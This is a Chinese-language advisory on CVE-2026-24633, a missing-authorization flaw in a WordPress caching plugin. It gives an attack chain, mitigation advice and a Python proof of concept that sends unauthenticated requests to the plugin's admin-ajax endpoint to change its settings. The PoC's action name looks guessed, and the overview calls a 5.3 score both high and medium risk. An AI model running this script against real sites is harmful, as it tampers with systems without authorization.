CVE-2026-24633 WordPress Add Expires Headers插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2026-24633

漏洞类型

缺失授权/访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Passionate Brains Add Expires Headers & Optimized Minify (add-expires-headers)

漏洞概述

CVE-2026-24633是WordPress插件"Add Expires Headers & Optimized Minify"中的一个高危安全漏洞。该插件由Passionate Brains开发，主要用于为网站资源添加Expires头和优化资源压缩功能。漏洞类型为Missing Authorization（缺失授权），存在于插件的访问控制机制中。由于插件在处理某些关键功能时未进行充分的权限验证，攻击者可以在无需认证的情况下利用错误配置的访问控制安全级别，修改插件的缓存配置和其他关键设置。此漏洞影响插件3.2.0及以下所有版本，CVSS评分5.3，属于中等严重程度。虽然该漏洞不直接导致代码执行或数据泄露，但攻击者可借此干扰网站性能优化配置，影响用户体验和网站正常运行。

技术细节

该漏洞的根本原因在于插件缺少适当的授权检查机制。Add Expires Headers & Optimized Minify插件在实现HTTP头优化功能时，某些管理接口或配置端点未实施基于用户角色的权限验证。攻击者可以通过直接访问这些端点，在无需管理员权限的情况下修改插件配置。具体而言，插件的设置保存功能未正确使用WordPress的nonce验证和current_user_can()权限检查，导致任何访问者（包括匿名用户）都能触发配置更新操作。攻击者可能利用此漏洞修改Expires头配置、调整缓存策略或更改资源压缩设置，从而影响网站的性能和缓存行为。在某些配置下，错误的缓存头设置可能导致资源无法及时更新，影响网站功能。

攻击链分析

STEP 1

步骤1

信息收集：攻击者扫描目标WordPress网站，识别是否安装Add Expires Headers & Optimized Minify插件及其版本

STEP 2

步骤2

漏洞识别：通过分析插件代码或使用自动化工具，识别出缺少授权检查的配置端点

STEP 3

步骤3

构造请求：攻击者构造恶意的HTTP请求，直接访问插件的配置保存接口

STEP 4

步骤4

利用漏洞：发送未授权请求修改插件配置，如Expires头设置、缓存策略等

STEP 5

步骤5

影响验证：确认配置已更改，验证对网站性能和功能的影响

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-24633 PoC - Missing Authorization in Add Expires Headers Plugin
# Target: WordPress site with vulnerable Add Expires Headers plugin (<=3.2.0)

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2026-24633
    """
    # Try to access plugin settings without authentication
    # Common plugin endpoints
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-admin/options-general.php?page=add-expires-headers',
    ]
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, timeout=10, verify=False)
            # Check if we can access admin functionality without auth
            if response.status_code == 200:
                print(f"[+] Potentially vulnerable endpoint: {url}")
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    
    # Try to modify settings via AJAX (exploitation attempt)
    ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'
    data = {
        'action': 'add_expires_headers_save',
        'expires_headers': 'test',
    }
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10, verify=False)
        if response.status_code == 200:
            print(f"[+] AJAX endpoint accessible - plugin may be vulnerable")
            print(f"[+] Response: {response.text[:200]}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) > 1:
        check_vulnerability(sys.argv[1])
    else:
        print('Usage: python cve-2026-24633-poc.py <target_url>')
        print('Example: python cve-2026-24633-poc.py http://target.com')

影响范围

Add Expires Headers & Optimized Minify <= 3.2.0

Add Expires Headers & Optimized Minify <= 3.1.0

Add Expires Headers & Optimized Minify <= 3.0.0

防御指南

临时缓解措施

临时缓解措施：在完成插件升级前，可通过Web应用防火墙（WAF）规则限制对插件管理接口的访问，或在wp-config.php中添加临时访问控制代码限制未授权用户访问插件相关URL。同时建议监控网站日志，关注异常的插件配置请求。